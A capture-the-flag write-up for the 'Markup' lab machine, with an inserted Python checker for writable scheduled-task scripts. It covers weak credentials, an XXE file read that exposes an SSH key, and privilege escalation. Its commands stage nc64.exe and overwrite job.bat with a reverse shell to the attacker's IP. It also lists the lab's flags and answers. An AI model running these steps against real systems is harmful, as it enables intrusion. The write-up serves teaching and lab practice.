Markup (Tier 2)

Description

  • Tier -> 2

  • Difficulty -> Very Easy

  • OS -> Windows

  • Tags -> Apache / SSH / PHP / Reconnaissance / Scheduled Job Abuse / Weak Credentials / Arbitrary File Upload / XXE Injection / Weak Permissions

Write-up

  • I started with an initial full-port scan using Nmap

nmap 10.129.136.233 -p- -Pn --min-rate 2500 -oN scan.txt

  • Then, to learn more about the services running on the open ports, I ran a version-detection and default-script scan against them

nmap 10.129.136.233 -p22,80,443 -sVC -oN serv_scan.txt

  • With this, I answered the first question

Answer: 2.4.41


  • I found an HTTP service running on port 80, so I went to the browser to explore the content and found a login page. I tried logging in with common credentials and, fortunately, the combination of username admin and password password got me into a new dashboard


  • With this, I answered the next question

Answer: admin:password


  • Then I explored the tabs of the website. In the Contact tab I found an email address and a submission form. Unfortunately, that form didn't work, so I went to the Order tab, which also had a form. After filling it out and clicking the Submit button, it worked, giving me a pop-up informing me that the request had been sent


  • To check how the request was being sent, I used FoxyProxy and Burp Suite to intercept it. I noticed a PHP session cookie and, what caught my attention, the fact that the site was sending the form data as XML


  • With this and a little research, I answered the next questions

Answer: order


Answer: 1.0


Answer: XML External Entity


  • To retrieve more information about this section, I checked the page source and found a comment from one of the developers containing their name, possibly a user on the system. Since I didn't find anything else of interest, I could use this information later when modifying the XML of the request

  • With this, I answered the next question

Answer: Daniel


  • I tried a test for a possible XXE injection and it worked, letting me retrieve the content of the Windows hosts file (the equivalent of /etc/hosts). With this and the username found previously, I tried accessing the Desktop folder of the user Daniel and reading the user.txt file, which usually contains the user flag, and it worked


  • So I continued retrieving files that could help me gain access to the system as one of its users. Looking at Daniel's SSH configuration directory, I found a file with the default name id_rsa, the user's private key. I used it to connect to the system over SSH as Daniel, and it worked

ssh Daniel@10.129.136.233 -i ssh_key

  • Once inside, I tried launching PowerShell and the system let me do so without any issue. Then I checked the user's privileges but didn't find anything relevant, so I kept exploring the system for a possible way to escalate privileges


  • Exploring the root of C:\ I found a folder named Log-Management, which is not a standard Windows system folder. I accessed it and listed its content, finding a job.bat file. Looking at it, I saw it was a script that appeared to be a scheduled task interacting with an executable named wevtutil.exe. The script also stated that it could only be run with administrator permissions, which told me it was being executed with privileges


  • With this and the previously found user flag, I answered the next questions

Answer: job.bat


Answer: wevtutil.exe


Answer: 032d2fc8952a8c24e39c8f0ee9918ef7


  • So I looked up what this program does and understood that the job was calling it to clear the system logs periodically. With this, I checked whether the job was still running on the system and which permissions its script had, in case they allowed me to modify its content. I found it grants full-control permissions to all local users. Then I checked the current system processes and saw the system was still using the program

icacls job.bat   # show the ACL of the script; BUILTIN\Users has (F), full control
ps               # PowerShell alias of Get-Process, to confirm the job is still running
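The weakness the write-up exploits at this point is a script executed with administrator privileges that every local user can modify. The following is an added example, not code from the write-up or the box: a Python check that parses icacls-style output for a file and reports any write-capable right (F, M, W, or the specific WD/AD rights) granted to a principal that any local user can act as. The icacls output and the HOST\Daniel account shown are constructed for the example; the path and the BUILTIN\Users full-control grant match what the page describes.

```python
import re
from dataclasses import dataclass

# icacls rights that allow the file content to be changed: the simple
# rights F (full), M (modify), W (write) and the specific rights WD (write
# data) and AD (append data).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}

# Principals that any local user effectively is a member of (compared in
# lower case).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# One access control entry as icacls prints it: PRINCIPAL:(R1)(R2)...
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")


@dataclass
class Finding:
    path: str
    principal: str
    rights: list


def parse_icacls(path: str, output: str) -> list[tuple[str, list[str]]]:
    """Turn icacls output for a single file into (principal, rights) pairs."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        # icacls prints the file name in front of the first ACE only.
        if line.startswith(path + " "):
            line = line[len(path) + 1:]
        match = ACE_RE.match(line)
        if not match:
            continue  # trailer lines such as "Successfully processed ..."
        groups = re.findall(r"\(([^)]*)\)", match.group("rights"))
        # Specific rights are comma separated inside one pair of parentheses.
        rights = [r.strip() for group in groups for r in group.split(",")]
        aces.append((match.group("principal"), rights))
    return aces


def writable_by_low_priv(path: str, output: str) -> list[Finding]:
    """Report low-privilege principals that can change the file's content."""
    findings = []
    for principal, rights in parse_icacls(path, output):
        if "DENY" in rights:
            continue  # a deny ACE takes nothing away from the grants we look for
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(WRITE_RIGHTS & set(rights))
        if granted:
            findings.append(Finding(path, principal, granted))
    return findings


JOB_PATH = r"C:\Log-Management\job.bat"

# Constructed icacls output reflecting the permissions described on the page.
SAMPLE_ICACLS = r"""C:\Log-Management\job.bat BUILTIN\Users:(F)
                          NT AUTHORITY\SYSTEM:(F)
                          BUILTIN\Administrators:(F)
                          HOST\Daniel:(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# The same file after restricting write access to privileged principals.
HARDENED_ICACLS = r"""C:\Log-Management\job.bat NT AUTHORITY\SYSTEM:(F)
                          BUILTIN\Administrators:(F)
                          HOST\Daniel:(RX)
"""

if __name__ == "__main__":
    for finding in writable_by_low_priv(JOB_PATH, SAMPLE_ICACLS):
        print(f"{finding.path}: {finding.principal} has {finding.rights}")
    print("hardened:", writable_by_low_priv(JOB_PATH, HARDENED_ICACLS))
```

The corresponding fix on the host is to replace the ACL so that only SYSTEM and Administrators can write the script that a privileged task runs, for example `icacls C:\Log-Management\job.bat /inheritance:r /grant:r "BUILTIN\Administrators:(F)" "NT AUTHORITY\SYSTEM:(F)"`, and to apply the same check to every script path referenced by scheduled tasks that run as a privileged account.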


  • Knowing this, I could modify the file's content to execute arbitrary programs or commands. So I used it to obtain a reverse shell with a Netcat executable, first downloading the binary to my machine and then transferring it to the target

# In our machine
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe   # get the nc executable itself (the raw file, not the GitHub page)
python3 -m http.server 1234   # serve the folder containing the executable

# In the target machine (PowerShell; wget is an alias of Invoke-WebRequest)
wget http://10.10.14.117:1234/nc64.exe -OutFile nc64.exe

  • Then I set up a listener on my machine to receive the connection and wrote the payload that runs Netcat into the job file. PowerShell gave me an error, so I closed it and did it from CMD, which worked, and I confirmed the content of the file had been modified. Then I waited for the script to be executed by the system, and after a while the listener caught a shell as the Administrator user

# In our machine
nc -nvlp 4444

# In the target machine
echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.117 4444 > C:\Log-Management\job.bat

  • Finally, I went to the Desktop folder of the Administrator user, listed its content and noticed a root.txt file, which after reading it gave me the root flag


  • With this, I got the root flag and pwned the machine

Answer: f574a3e7650cebd8c39784299cb570f8
